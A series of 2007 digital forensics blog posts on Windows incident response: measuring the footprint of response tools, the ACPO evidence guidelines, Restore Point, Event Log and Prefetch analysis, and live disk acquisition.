Thursday, July 12, 2007

Tool Testing Methodology, Memory

In my last post, I described what you'd need to do to set up a system in order to test the effects of a tool we'd use on a system for IR activities. I posted this as a way of filling in a gap left by the ACPO Guidelines, which says that we need to "profile" the "forensic footprint" of our tools. That post described tools we'd need to use to discover the footprints within the file system and Registry. I invite you, the reader, to comment on other tools that may be used, as well as provide your thoughts regarding how to use them...after all, the ACPO Guidelines also state that the person using these tools must be competent, and what better way to get there than through discussion and exchange of ideas?

One thing we haven't discussed, and there doesn't seem to be a great deal of discussion of, is the effects of the tools we use on memory. One big question that is asked is, what is the "impact" that our tools have on memory? This is important to understand, and I think one of the main drivers behind this is the idea that when IR activities are first introduced in a court of law, claims will be made that the responder overwrote or deleted potentially exculpatory data during the response process. So...understanding the effect of our tools will make us competent in their use, and we'll be able to address those (and other) issues.

When a process is created (see Windows Internals, by Russinovich and Solomon for the details, or go here), the EXE file is loaded into memory...the EXE is opened and a section object is created, followed by a process object and a thread object. So, memory pages (default size is 4K) are "consumed". Now, almost all EXEs (and I say "almost" because I haven't seen every EXE file) include an import table in their PE header, which describes all of the dynamic link libraries (DLLs) that the EXE accesses. MS provides API functions via DLLs, and EXEs access these DLLs rather than the author rewriting all the code used completely from scratch. So...if the necessary DLL isn't already in memory, then it has to be located and loaded...which in turn, means that more memory pages are "consumed".

So, knowing that these memory pages are used/written to, what is the possibility that important 'evidence' is overwritten? Well, for one thing, the memory manager will not overwrite pages that are actively being used. If it did, stuff would randomly disappear and stop working. For example, your copy of a document may disappear because you loaded Solitaire and a 4K page was randomly overwritten. We wouldn't like this, would we? Of course not! So, the memory manager will allocate memory pages to a process that are not currently active.

For an example of this, let's take a look at Forensic Discovery, by Dan Farmer and Wietse Venema...specifically, chapter 8, section 17:

As the size of the memory filling process grows, it accelerates the memory decay of cached files and of terminated anonymous process memory, and eventually the system will start to cannibalize memory from running processes, moving their writable pages to the swap space. That is, that's what we expected. Unfortunately even repeat runs of this program as root only changed about 3/4 of the main memory of various computers we tested the program on. Not only did it not consume all anonymous memory but it didn't have much of an affect on the kernel and file caches.

Now, keep in mind that the tests that were run were on *nix systems, but the concept is the same for Windows systems (note: previously in the chapter, tests run on Windows XP systems were described, as well).

So this illustrates my point...when a new process is loaded, memory that is actively being used does not get overwritten. If an application (Word, Excel, Notepad) is active in memory, and there's a document that is open in that application, that information won't be overwritten...at worst, the pages not currently being used will be swapped out to the pagefile. If a Trojan is active in memory, the memory pages used by the process, as well as the information specific to the process and thread(s) themselves will not be overwritten. The flip side of this is that what does get "consumed" are memory pages that are freed for use by the memory manager; research has shown that the contents of RAM can survive a reboot, and that even after a new process (or several processes) have been loaded and run, information about exited processes and threads still persists. So, pages used by previous processes may be overwritten, as will pages that contained information about threads, and even pages that had not been previously allocated. When we recover the contents of physical memory (ie, RAM) one of the useful things about our current tools is that we can locate a process, and then by walking the page directory and table entries, locate the memory pages used by that process. By extracting and assembling these pages, we can then search them for strings, and anything we locate as "evidence" will have context; we'll be able to associate a particular piece of information (ie, a string) with a specific process. The thing about pages that have been freed when a process has exited is that we may not be able to associate that page with a specific process; we may not be able to develop context to anything we find in that particular page.

Think of it this way...if I dump the contents of memory and run strings.exe against it, I will get a lot of strings...but what context will that have? I won't be able to associate any of the strings I locate in that memory dump with a specific process, using just strings.exe. However, if I parse out the process information, reassembling EXE files and memory used by each process, and then run strings.exe on the results, I will have a considerable amount of context...not only will I know which process was using the specific memory pages, but I will have timestamps associated with process and threads, etc.

Thoughts? I just made all this up, just now. ;-) Am I off base, crazy, a raving lunatic?

Tool Testing Methodology

As I mentioned earlier, the newly-released ACPO Guidelines state:

By profiling the forensic footprint of trusted volatile data forensic tools,

Profiling, eh? Forensic footprint, you say? The next logical step is...how do we do this? Pp. 46 - 48 of my book make a pretty good start at laying this all out.

First, you want to be sure to document the tool you're testing...where you found it, the file size, cryptographic hashes, any pertinent info from the PE header, etc.

Also, when testing, you want to identify your test platform (OS, tools used, etc.) so that the tests you run are understandable and repeatable. Does the OS matter? I'm sure some folks don't think so, but it does! Why is that? Well, for one, the various versions of Windows differ...for example, Windows XP performs application prefetching by default. This means that when you run your test, depending upon how you launch the tool you're testing, you may find a .pf file added to the Prefetch directory (assuming that the number of .pf files hasn't reached the 128 file limit).

So, what testing tools do you want to have in place on the testing platform? What tools do we need to identify the "forensic footprint"? Well, you'll need two classes of tools...snapshot 'diff' tools, and active monitoring tools. Snapshot 'diff' tools allow you to snapshot the system (file system, Registry) before the tool is run, and again afterward, and then will allow you to 'diff' the two snapshots to see what what changed. Tools such as InControl5 and RegShot can be used for this purpose.

For active monitoring tools, I'd suggest ProcessMonitor from MS SysInternals. This tool allows you to monitor file and Registry accesses in real-time, and then save that information for later analysis.

In order to monitor your system for network activity while the tool is run, I'd suggest installing PortReporter on your system as part of your initial setup. The MS KB article (click on "PortReporter") also includes links to the MS PortQry and PortQryUI tools, as well as the PortReporter Log Parser utility for parsing PortReporter logs.

As many of the tools used in IR activities are CLI tools and will execute and complete fairly quickly, I'd also suggest enabling the Process Tracking auditing on your test system, so that the event record for process creation will be recorded.

Okay, so all of this covers a "forensic footprint" from the perspective of the file system and the Registry...but what about memory? Good question! Lets leave that for another post...

Thoughts so far?

Wednesday, July 11, 2007

Are you Security Minded?

Kai Axford posted on his blog that he's been "terribly remiss in his forensic discussions". This originated with one of Kai's earlier posts on forensic resources; I'd commented, mentioning my own books as resources.

Kai...no need to apologize. Really. Re: TechEd...gotta get approval for that from my Other Boss. ;-)

Updates, etc.

Not posting anywhere close to regularly lately, I felt that a couple of updates and notices of new finds were in order...

First off, James MacFarlane has updated his Parse-Win32Registry module, fixing a couple of errors, adding a couple of useful scripts (regfind.pl and regdiff.pl...yes, that's the 'diff' you've been looking for...), and adding a couple of useful functions. Kudos to James, a huge thanks, and a hearty "job well done"! James asked me if I was still using the module...I think "abuse" would be a better term! ;-)

An RTF version of Forensic CaseNotes has been released. I use this tool in what I do...I've added a tab or two that is useful for what I need and do, and I also maintain my analysis and exhibit list using CaseNotes. Now, with RTF support, I can add "formatted text, graphics, photos, charts and tables". Very cool!

LonerVamp posted about some MAC changing and Wifi tools, and I got to thinking that I need to update my Perl scripts that use James' module to include looking for NICs with MACs specifically listed in the Registry. Also, I saw a nifty tool called WirelessKeyView listed...looks like something good to have on your tools CD, either as an admin doing some troubleshooting, or as a first responder.

Another useful tool to have on your CD is Windows File Analyzer, from MiTeC. This GUI tool is capable of parsing some of the more troublesome, yet useful files from a Windows system, such as Prefetch files, shortcut/LNK files, and index.dat files. So...what's in your...uh...CD?

LonerVamp also posted a link to MS KB 875357, Troubleshooting Windows Firewall settings in Windows XP SP2. You're probably thinking, "yeah? so?"...but look closely. From a forensic analysis perspective, take a look at what we have available to us here. For one, item 3 shows the user typing "wscui.cpl" into the Run box to open the Security Center applet...so if you're performing analysis and you find "wscui.cpl" listed in the RunMRU or UserAssist keys, what does that tell you?

What other useful tidbits do you find in the KB article that can be translated into useful forensic analysis techniques? Then, how would you go about automating that?

Another useful tool if you're doing any work with scripts (JavaScript, etc.) in HTML files, is Didier Stevens' ExtractScripts tool. The tool is written in Python, and takes an HTML file as an argument, and outputs each script found in the HTML file as a separate file. Very cool stuff!

Some cool stuff...anyone got anything else they'd like to add?

ACPO Guidelines

The Association of Chief Police Officers (ACPO), in association with 7safe, has recently released their updated guide to collecting electronic evidence. While the entire document makes for an interesting read, I found pages 18 and 19, "Network forensics and volatile data" most interesting.

The section begins with a reference back to Principle 2 of the guidelines, which states:

In circumstances where a person finds it necessary to access original data held on a computer or on storage media, that person must be competent to do so and be able to give evidence explaining the relevance and the implications of their actions.

Sounds good, right? We should also look at Principle 1, which states:

No action taken by law enforcement agencies or their agents should change data held on a computer or storage media which may subsequently be relied upon in court.

Also, Principle 3 states:

An audit trail or other record of all processes applied to computer-based electronic evidence should be created and preserved. An independent third party should be able to examine those processes and achieve the same result.

Okay, I'm at a loss here. Collecting volatile data inherently changes the state of the system, as well as the contents of the storage media (i.e., Prefetch files, Registry contents, pagefile, etc.), and the process used to collect the volatile data cannot be later used by a third party to "achieve the same result", as the state of the system at the time that the data is collected cannot be reproduced.

That being said, let's move on...page 18, in the "Network forensics and volatile data" section, includes the following:

By profiling the forensic footprint of trusted volatile data forensic tools, an investigator will be in a position to understand the impact of using such tools and will therefore consider this during the investigation and when presenting evidence.

It's interesting that this says "profiling the forensic footprint", but says nothing about error rates or statistics of any kind. I fully agree that this sort of thing needs to be done, but I would hope that it would be done and made available via a resource such as the ForensicWiki, so that not every examiner has to run every test of every tool.

Here's another interesting tidbit...

Considering a potential Trojan defence...

Exactly!

Continuing on through the document, I can't say that I agree with the order of the sequence for collecting volatile data...specifically, the binary dump of memory should really be first, not last. This way, you can collect the contents of physical memory in as near a pristine state as possible. I do have to question the use of the term "bootable" to describe the platform from which the tools should be run, as booting to this media would inherently destroy the very volatile data you're attempting to collect.

Going back to my concerns (the part where I said I was "at a loss") above, I found this near the end of the section:

By accessing the devices, data may be added, violating Principle 1 but, if the logging mechanism is researched prior to investigation, the forensic footprints added during investigation may be taken into consideration and therefore Principle 2 can be complied with.

Ah, there we go...so if we profile our trusted tools and document what their "forensic footprints" are, then we can identify our (investigators) footprints on the storage media, much like a CSI following a specific route into and out of a crime scene, so that she can say, "yes, those are my footprints."

Thoughts?

Thursday, July 05, 2007

Windows Forensic Analysis Book Review Posted

Richard Bejtlich has posted a review of Windows Forensic Analysis on Amazon.

5 (count 'em!) stars! Wow! The review starts with:
Wow -- what a great forensics book -- a must read for investigators.

Very cool. High praise, indeed!

Thanks, Richard!

Wednesday, June 27, 2007

Book Updates

I got word yesterday that Syngress is going to discontinue selling hard copy books from their web site. They will continue to sell ebooks, and provide links to other online retailers.

The new link for my book is here.

Sunday, June 17, 2007

What is RAM, legally speaking?

Ever wondered what the legal definition of "RAM" is? I was perusing the Computer Forensics and Incident Response blog this morning and found an interesting post regarding RAM and the US Courts. In short, a court document (judge's decision) from the case of Columbia Pictures Industries, et al, vs Justin Bunneli, et al, was posted on the web, and contains some interesting discussion regarding RAM.

In short, the document illustrates a discussion in which RAM constitutes "electronically stored information", and can be included in discovery. The document contains statement such as "...Server Log Data is temporarily stored in RAM and constitutes a document...".

Interestingly enough, there is also discussion of "sploilation of evidence" due to the defendant's failure to preserve/retain RAM.

The defendants claimed that, in part, they could not produce the server log data from RAM due to burden of cost...which the judge's decision states that they failed to demonstrate. There are some interesting notes that address issues of RAM as "electronically stored information" from which key data would otherwise not be available (ie, the document states that the server's logging function was not enabled, but the requests themselves were stored in RAM).

Ultimately, the judge denied the plaintiff's request for evidentary sanctions due to the defendant's failure to preserve the contents of RAM, partially due to a lack of prior precedence and a specific request to preserve RAM (the request was for documents).

The PDF document is 36 pages long, and well worth a read. I will not attempt to interpret a legal document here...I simply find the judge's decision that yes, RAM constitutes electronically stored information, however temporary, to be very interesting.

What are your thoughts? How do you think this kind of issue will fare given that there are no longer any freely available tools for dumping the contents of Physical Memory from Windows systems?

Addendum: An appeal brief has been posted by the defendant's lawyers.

Saturday, June 16, 2007

Restore Point Analysis

Others have posted bits and pieces regarding System Restore Point analysis (Stephen Bunting's site has some great info), and I've even blogged on this topic before, but I wanted to add a bit more information and a tidbit or two I've run across. This will go a bit beyond what's in my book, but I do want to say that the content in my book is not invalidated in any way.

First off, you can use some of the tools on the DVD accompanying my book in either live response or during post-mortem analysis to collect information from the Restore Points. I've recently updated the code to the SysRestore.pl ProDiscover ProScript to make it more usable and flexible, given some situations I've seen recently.

Another interesting thing I've run across is that using an alternative method of analysis, such as mounting the acquired image as a read-only drive letter (using VDKWin or Mount Image Pro), can be more of a problem than a solution. Accessing the system this way can really be a boon to the examiner, as you can hit the system with an AV scanner (...or two...or three...) and save yourself a great deal of time trying to locate malware. However, the problem occurs due to the fact that the ACLs on the System Volume Information directory require System level access for that system, and even having System level access on your analysis system does not equate to System level access on the mounted image. So things tend not to work as well...files within the "protected" directories will not be scanned, and your alternative is to either perform your analysis within a forensic analysis application such as ProDiscover (using ProScripts), or export the entire directory structure out of the image, at which point, storage is then a consideration (I've seen systems with quite a number of Restore Points).

This is can be an issue because bad guys may try to hide stuff in these directories...read on...

Remember me mentioning the existence of web browsing history for the Default User? This indicates the use of the WinInet API (wget.exe, IE, etc.) by someone who accessed the system with System level privileges. This level of access would also allow that user to access the System Volume Information directory, where the Restore Points are maintained, and possibly put things there, such as executable image files, etc. It's unlikely that a restore point would be used for persistence (ie, point a Windows Service to an executable image within a restore point), as the restore points eventually get deleted or flushed out (see the fifo.log file). However, this would be an excellent place to put an installer or downloader file, and then the intruder could place the files that he wanted to be persistent in either the System Volume Information directory, or the "_restore*" directory.

So, besides looking for files that we know are in the Restore Points (ie, drivetable.txt, rp.log, Registry files), we should also consider looking for files that shouldn't be there, particularly if we find other artifacts that indicate a System-level intrusion.

Beyond this, Restore Points provide a wealth of historical information about the system. By parsing all of the rp.log files, we can develop a timeline of activity on the system that will give us an idea of what was done (system checkpoint, application install/uninstall, etc.) as well as provide us with that timeline...if the Restore Points are in sequence and the dates seem skewed, then we have an indication that someone may have fiddled with the system time. Using the drivetable.txt file, you can see what drives were attached to the system at the time that the Restore Point was created (by default, one is created every 24 hrs).

Beyond these files, we also have access to the Registry files that are backed up to the Restore Points. You can parse these to see if and when a user's privilege levels were modified (ie, added to the Administrator group), determine IP addresses and network settings for the system (parse the NetworkCards key from the Software file, then the Tcpip Services key from the System file), etc.

Analysis of the Registry files maintained in Restore Points is also useful in determining a timeline for certain Registry modifications that are difficult to pin down. For example, when a Registry value is added or modified, the key's LastWrite time is updated. What if one value is added, and one is modified...how do we determine which action caused the LastWrite time to be modified? Well, by using the historical data maintained in the Restore Points, we can look back and see that on this date, the modified value was there, but the added value wasn't...and then it appears in the next Restore Point. Not exact, but it does give us a timeline.

So...what interesting things have you found in Restore Points?

Links
Kelly's Korner (XP Restore Points)
MS Windows XP System Restore
System Restore WMI Classes

Thursday, June 14, 2007

EventLog Analysis

In my book, I covered the Windows 2000, XP, and 2003 EventLog file header and event record structure in some detail. There's also a Perl script or two on the DVD that accompanies the book that let you parse an Event Log without using the Windows API, so that you avoid that pesky message about the Event Log being corrupted.

I've since updated one of the scripts (changing the name to evt2xls.pl), so that now it writes the information that it parses from the Event Log file directly into an Excel spreadsheet, even going so far as to format the date field to that it "makes sense" to Excel when you want to sort based on the date. I've found that writing the data directly to a spreadsheet makes things a bit easier for me, particularly when I want to sort the data to see just certain event record sources, or perform some other analysis. I've also added some functionality to collect statistics from the Event Log file, and display information such as total counted event records, frequency of event sources and IDs, etc., in a separate report file. I've found these to be very useful and efficient, giving me a quick overview of the contents of the Event Logs, and making my analysis of a system go much smoother, particularly when combined with Registry analysis (such as parsing the Security file for the audit policy...see the Bonus directory on the DVD for the Perl script named poladt.pl and its associated EXE file). One of the things I'm considering adding to this script is reporting of successful and failed login attempts, basing this reporting in part on the type of the login attempt (ie, Service vs Local vs Remote).

Here's something to think about...there is sufficient information in the book, and Perl code on the DVD, such that you can create tools for parsing of event records from other sources, such as RAM dumps, the pagefile, and even unallocated space. I'm considering writing a couple of small tools to do this...not search the files, specifically (I can add that to the code that parses RAM dumps) but to start by simply extracting event records given a file and an offset within the file.

But what about actual Event Log analysis? What about really using the Event Log to get some insight into activity on the system? What can we look for and how can we use it?

Here are some tidbits that I've come across and use...please don't consider this a complete list, as I hope that people will contribute. This is just to get folks started...

Stephen Bunting has a great write-up that explains how to use the Event Log to track time change events, such as when someone alters their system time.

The Application Event Log is a great place to look for events generated by antivirus applications. This will not only tell you if an antivirus application is installed on the system (you can also perform Registry analysis to determine this information), but perhaps the version, when it was active, etc.

In the System Event Log, Event ID 6161 (Source: Print) tells you when a file failed to print. The event message tells you the name of the file that failed to print, the username, and the printer.

Also in the System Event Log, Event ID 35 (Source: W32Time) is an Information event that tells you that your system is sync'ing with a time server, and provides the IP address of your system. This can be very useful in a DHCP environment, as it tells you the IP address assigned to the system (actually, the interface) at a particular date and time.

Windows Defender (Source: WinDefend) will generate an event ID 1007 when it detects malware on a system; the event strings contain specific information about what was found.

Whenever you're doing Event Log analysis, be sure to go to EventID.net for help understanding what you're looking at. Most of the listed event IDs have detailed explanations of what can cause the event, as well as links to information at MS.

Again, this is not a complete list of items that you may find and use in your analysis...these are just somethings that come to mind. And remember, you get a bit more out of Event Log analysis when you combine it with Registry analysis, not only of the audit policy for the system and the settings for the Event Logs, but with other sources, as well.

Links
EventLog Header structure
Event Record structure
EventLog EOF record structure
EventLog File Format

Wednesday, June 13, 2007

Determining the version of XP

I received an interesting comment to one of my recent blog posts...the poster was musing that he wished he could determine the version of XP (Home or Pro), presumably during a post-mortem examination. As this struck my interest, I began to research this...and most of what I found applies to a live running system. For example, MS has a KB article that tells you how to determine the version of XP you've got. Also, the WMI class Win32_OperatingSystem has a value called "SuiteMask" which will let you determine the version of the operating system; to see if you're on the Home version of XP, perform a logical AND operation with the SuiteMask value and 0x0200 (the "Personal" bit) - if it succeeds, you're on XP Home. You can also use the Win32::GetOSVersion() function in Perl, or implement the WMI Win32_OperatingSystem class in Perl.

This information seems to be maintained in memory, and appears to be retrieved using the GetVersionEx() API function. Running a couple of tests to extract the information while running RegMon doesn't appear to reveal anything interesting as far as Registry keys that are accessed while attempting to determine the OS version.

During a post-mortem examination, you can go to the file "%WinDir%\system32\eula.txt" and locate the last line of the file that begins with "EULAID", and you'll see something similar to:

EULAID:XPSP2_RM.0_PRO_OEM_EN

If it says "HOM" instead of "PRO", you're dealing with the Home version of XP.

Also, you can try the file "%windir%\system32\prodspec.ini", and right below the line that says "[Product Specification]", you'll see an entry that will tell you which version of the OS you're working with (note: be sure to check the last modification date on these files, as well...).

Links
Determine the version of IE installed
Check the Version of Office XP
Determine the Windows version using C# (using VB)
32- or 64-bit version of Windows?

Monday, June 11, 2007

Some Registry stuff...

I like "Registry stuff". I don't know what the fascination is, but for some reason, I love stuff that has to do with the Registry.

Anyway, I ran across something recently...I was looking at one of my own systems and ran across an interesting value in my AppInit_DLLs Registry value. Just the fact that there was data within this value was interesting enough! But then I saw something even more interesting...another value named LoadAppInit_DLLs. I haven't found anything specific about this value at the MS site yet, but this appears to be a Vista-only Registry value, in that it is only recognized and utilized by the Vista operating system. This is covered briefly in Symantec's Analysis of the Windows Vista Security Model paper.

This value appears to be used by PGP, as well as some tools from Google (both of these are based on Google searches for occurances of the value name).

On the topic of the Registry, here's how to use PowerShell to get the name of the last user to log onto a system.

So, what are you looking in the Registry for...or looking for in the Registry?

Links:
Forensics Wiki: Windows Registry
The Windows Registry as a Forensic Resource
Alien Registry Viewer
32-bit Application access to the Registry on 64-bit versions of Windows

Windows Forensic Analysis Book Review

Andrew Hay posted the first review of my book...that I'm aware of! ;-)

Andrew also posted the review on Amazon!

Thanks, Andrew!

Saturday, June 02, 2007

AntiForensics Article

I read an interesting article recently that talks about antiforensics. At first glance, the article is something of an interesting piece, but reading it a second time and thinking about what was actually being said really got me thinking. Not because the article addresses the use of antiforensics, but because it identifies an issue (or issues) that needs to be addressed within the forensics community. Yes, these tools are out there, and we should be thankful that they we made available by someone...otherwise, how could we address the issue? So, what do we need to do to update our methodologies accordingly? Perhaps more importantly, should be be trying to get ahead of the power curve, rather than playing catch up?

I do feel that it is important to mention something else in the article that I found very concerning, though:
"...details of the TJX breach—called the biggest data heist in history, with more than 45 million credit card records compromised—strongly suggest that the criminals used antiforensics to maintain undetected access to the systems for months or years and capture data in real time."

Strongly suggest, how?

The article goes on to say:
"Several experts said it would be surprising if antiforensics weren’t used."

Several experts? Who? Were any of them involved in the investigation? If they were, what "expert" reveals this kind of information, and keeps his or her job? If not...why are they speculating? It just seems to me that this part of the article is out of place, and when viewed within the context of the entire article, breaks up the flow. The article has a logical progression of here's the issue, okay we've identified it, let's get about fixing it...which all makes sense...but then this bit of speculation seems out of place.

Overall, though, it appears that the article points to some issues that should be addressed within the digital forensic community. Are the tools we have worthless? Not at all. We just have to make better use of the information we have at hand. The article mentions building layers of "evidence", using multiple sources of information to correlate and support what we found in our digital investigation.

Also, Harlan's Corollary to Jesse's First Law of Computer Forensics really seems to be applicable now more than ever! ;-)

Thoughts on Live Acquisition

Recently, I've been doing some thinking about issues surrounding live acquisitions - specifically, acquiring an image from a system that is running, as opposed to either booting the system to an alternate OS, or removing the hard drive and hooking it up to a write-blocker.

There are several methods for performing a live acquisition, but most involve running an agent or application of some kind on the system itself. You can do this using ProDiscover (install or run the PDServer agent from a CD or thumb drive), FTK Imager (run from a CD or thumb drive, and write the image files to an external drive or an already-mapped share), or with good ol' dd and netcat running from a CD. Regardless of how you choose to do this, there is an additional process running on the system...so think Heisenberg's Uncertainty Principle, but in the digital realm.

So in acquiring an image from a live system, we need to introduce a process into a system of already running processes. While our intention is to take care and disturb the 'scene' as little as possible, it is simply a fact that we're going to leave some artifacts of our activities on the system...memory is consumed by our process, as are buffers, perhaps other processes have pages written out to the pagefile, etc. However, we address this issue with thorough documentation of our procedures and methodologies.

Now, in his book Computer Evidence: Collection & Preservation, Chris Brown describes the result of a live acquisition as a "smear", as from a temporal perspective, that's what we've got. Remember, it takes time to acquire an image from a hard drive, and if the system is still live and running when you acquire that image, then there is the distinct possibility that some sectors may change after you acquire them. Rather than having a sharp, distinct snapshot in time as when you acquire an image from a hard drive that has been removed from a system, you get a "smudge" or a "smear" instead. Also, as Greg Kelly pointed out in another forum recently, some of what we would normally consider stagnant data (Registry, files, etc.) can actually be considered volatile, and subject to change during the course of our acquisition...think log files, Event Log entries, the pagefile, etc.

Now, would it be possible to minimize this effect, by limiting what's running on the system during the acquisition? I believe that the answer to this is "yes". To do this, we'd need to take a couple of things into consideration. We'd should first ask ourselves, is this necessary? Hhhhmmm...if you're imaging the system over the network, and that system is still connected to the network, what is it doing on the network while you're acquiring your image? Is it serving up web pages, processing email, etc?

Before we continue, remember, we're talking about a live acquisition here, getting an image of the hard drive, NOT collecting the contents of memory.

Okay, that being said...if you're imaging over the network, is the system still providing services (shares via the Server service, etc.) that may have a significant effect on what you walk away with? We have to consider this in the face of what effect our actions will have on the system itself when we, say, disable a service. First, we have to see what processes are running, and to do that, we need to load some software and run another process (unless you're using the ProDiscover PDServer, as the agent provides this functionality, as well). Then we have to weigh the benefits of disabling the process or service against the "costs" of the effect that our actions have on the contents of the hard drive. Is that process really processing anything? We know that it may have file handles open, etc. But is there enough of an effect on the contents of the drive that it would make a significant difference within the time it takes to acquire the image? Also, if I disable that process/service, what happens? Any log files may be closed, perhaps the operating system itself will write an entry into the System or Application Event Log, etc.

Some of the processes or services I might consider shutting down include:
  • AntiVirus products - these things reach out on their own and update themselves, or run scans automatically
  • Task Scheduler - check to see if there are any jobs scheduled to run...this can get in the way of your acquisition (also, see the "Notes from the Underground..." sidebar on pp 215-216 of my book for an interesting tidbit on hiding scheduled tasks)
  • Windows Firewall - depending upon how it's configured (we'd want to check, of course) there may be some significant issues. I included a sample pfirewall.log file on the DVD with my book...I'd turned up logging on the firewall and hit it with nmap. ;-)
  • Exchange/IIS - if the system is still connected to the network do you want it processing email and web pages during the acquisition? Think the same thing for the FTP and SMTP services that sometimes get installed along with IIS.
This isn't meant to be a complete list, of course, but instead it's meant to start some thinking about what we have to consider before shutting a service down, or disabling a process.

So, before doing any of this, we need to put some thought into it. What, if anything, am I going to disable or shut down? Do I even need to? In some cases, live acquistions I've done have been of systems that had already been taken off of the network (not by me) and shut down, and then rebooted so they could be acquired (acquisition via write-blocker was not possible). With no network connections, I'm not overly concerned about major changes to the system during the acquisition process...the NTP service may log a complaint with the Event Log, but little else may happen. However, this isn't always the case...we're seeing a greater need for live response, both in acquiring the contents of memory, as well as performing live acquisitions of major systems that cannot be brought down or offline. If this is the case, document it. On your acquisition worksheet or in your case notes, clearly state "these services could not be halted or disabled due to...".

This is just a first blush...getting my thoughts down, thinking through things, determining if there is even a strong enough need for something like this...perhaps a matrix of services and processes, and when its a good idea to shut them down, how to do so, etc. Is this necessary?

Also, because I know the question is going to come up...addressing this same issue in the face of acquiring the contents of physical memory is an entirely separate post. Stay tuned!

Friday, June 01, 2007

A little about my book...

I apologize for this brief digression from the normal flow of the blog, but I've been receiving certain comments of late from several venues, and I thought I would address them all at once...

Many times, in forums (forii??) or email, someone will see me say "...as I mentioned in my book..." or "...as detailed in my book..." and I've received comments that some folks have been turned off by that. Okay, I can go with that, as I dislike sales pitches myself. So why do I say something like that?

The first conclusion that many seem to come to is that I'm trying to get you to purchase my book to line my pockets. Don't take this personally...but that is not only the first and most popular reaction, but also the most naive and uneducated one, as well. The folks who feel that way have not written a book and do not know what goes into writing such a book. Further, they have no idea how little an author makes on the sale of a book.

So why do it? Well, I wrote both of my books (first one and second one) as references...I had a lot of information to share, and I wanted to put it all in one place, and thought that it would be a good idea to do so in a manner that would make it available to others.

Now, I could post this stuff on the Internet for free, couldn't I? Rather constantly rewriting the same thing over and over again into emails and posts, I could cut-n-paste it, or simply post it on the Internet and constantly repost the link. But that gets pretty tiresome...so why not put it into a book? Another benefit of having it in a book is that there is a certain amount of credibility to the material...after all, it has to be tech edited and reviewed. My first book had three tech reviewers (some more engaged than others)...my second one started with one, and ultimately had two. Look at who tech edited my second book, and also look at the names of folks who are acknowledged as having made contributions that were important to the development of the book...doesn't that give the material a bit more credibility than posting it to the Internet?

So the next time you see me say those words, and think to yourself, "man, I wish this guy would just shut up about his book!!", try thinking instead that there maybe something useful in that book or on the DVD...Troy Larson thought so.

Tuesday, May 29, 2007

XP Firewall

Pp 216 - 128 of my book address the Windows XP firewall logs; where the file(s) is/are located on a system, and how they are useful to an investigation. I even include a sample firewall log on the DVD from where I enabled all logging and scanned my system with nmap from another system. I wanted folks to see what this kind of thing looks like, and I hope that you've found it beneficial.

Has anyone seen the "Bonus" directory on the DVD yet? Within the Bonus directory is a Perl script (and an associated EXE file...be sure to follow the instructions and keep the appropriate DLL with the EXE if you copy it off of the DVD) called "fw.pl" that uses WMI to get configuration information about the Windows XP firewall, and the SecurityCenter, in general.

Using either the Perl script or the EXE, type "-?" or "/h" at the command prompt to see the syntax information. Simply typing "fw.pl" or "fw" (for the EXE) tells the tool to collect and display all information. The tool displays basic information about the firewall, authorized applications, service/port information, SecurityCenter information, etc., all from a live system.

Porting this over to extracting the same information from an imaged system shouldn't be too difficult.

Note: The fw.exe file that you see in the Bonus directory was "compiled" from the Perl script using Perl2Exe. When I compiled the EXE, I used the "-small" switch so that the Perl runtime DLL would be pulled out as a separate file. However, other Perl modules are used as well, so I also compiled a version using the "-tiny" switch. This setting creates a separate DLL for each Perl module used, rather than pulling them out of the EXE at runtime and creating temporary files on the local hard drive. This file is in the "fw.zip" file...using the "-tiny" switch means that its suitable for use in live response, particularly with the Forensic Server Project.

Saturday, May 26, 2007

XP Anti-Forensics

There is discussion now and again in computer forensic circles regarding "anti-forensics", techniques that are used on systems to remove or obfuscate the artifacts that an examiner may look for and analyze. These are usually discussed in the context of purposeful actions performed by a user or attacker, but not so much in the sense that there are "under the hood", "behind the scenes" activities that go on as part of normal, day-to-day operations of the operating system that can serve the same function.

What is it that happens behind the scenes on a live XP system that most of us don't really know about? Have you ever fired up FileMon or RegMon and just watched what they recorded on a live system, without you interacting with the system at all? Now...move the mouse pointer across the screen...

While XP is a treasure trove of artifacts for an examiner, there are also things that the examiner needs to keep in mind when performing artifact extraction and analysis, particularly when it comes to looking for deleted files. When a file is deleted on a Windows system (not moved to the Recycle Bin, but really deleted), it's common knowledge that its not really gone. In a nutshell, the sectors that the file occupies are still on the hard drive, although they are now available for use by the operating system. And there's a lot that XP does to use those available sectors.

Many applications, such as MS Word, like to create temporary files while you're editing a document, and then delete those when you close the document. The sectors used by those temporary files need to come from somwhere. Yes, this is an application-specific issue and applies to any version of Windows that the application is running on.

XP creates System Restore Points, every 24 hrs by default, but also during various other actions, such as software installation or removal, etc. These Restore Points contain files that consume sectors. See my book for more information on Restore Point analysis.

Every three days, the XP Prefetch function performs a limited defragmentation of files on the hard drive. While this is limited, it still moves the contents of some sectors, overwriting others.

Speaking of XP Prefetch, when a user (any user) on the system launches a "new" application, a Prefetch file may be created for that application (assuming the 128 Prefetch file limit hasn't been reached). On my system, I have 104 .pf files, ranging in size from 8K to over 100K. Again, sectors are consumed.

As discussed in the Registry Analysis chapter of my book, there are a number of places within the Registry where a user's actions are recorded in some manner. New entries are added to the Registry, increasing the size of the files...not just the user's NTUSER.DAT file, but some actions will added entries to the HKLM hives, as well.

Of course, there are also a number of Registry settings that will have an effect on the examiner's analysis; these are addressed in detail in my book. While these aren't specific to XP, they do have a decidedly anti-forensic effect.

I mention these things because many times an examiner may be looking for evidence of a deleted file, carving unallocated space looking for a keyword or a file header, and come up empty. Remember Harlan's Corollary? ;-) Funny how there just seem to be more and more ways to apply that corollary...

Sites discussing anti-forensics aren't hard to find:
The MetaSploit AntiForensics Site
Ed Skoudis is quoted on antiforensics in 2003
Marcus K. Rogers' presentation
Ryan Harris' DFRWS paper

Friday, May 25, 2007

Prefetch Analysis

I've seen a couple of posts recently on other blogs (here's one from Mark McKinnon) pertaining to the Windows XP Prefetch capability, and I thought I'd throw out some interesting stuff on analysis that I've done with regards to the Prefetch folder.

First off, XP's Prefetch capability is meant to enhance the user eXPerience by helping frequently used applications load faster. Microsoft has a nice writeup on that, and portions of and references to that writeup are included in my book. XP has application prefetching turned on by default, and while Windows 2003 has the capability, only boot prefetching is turned on by default. So, XP systems are rich in data that can help you assess and resolve an incident investigation.

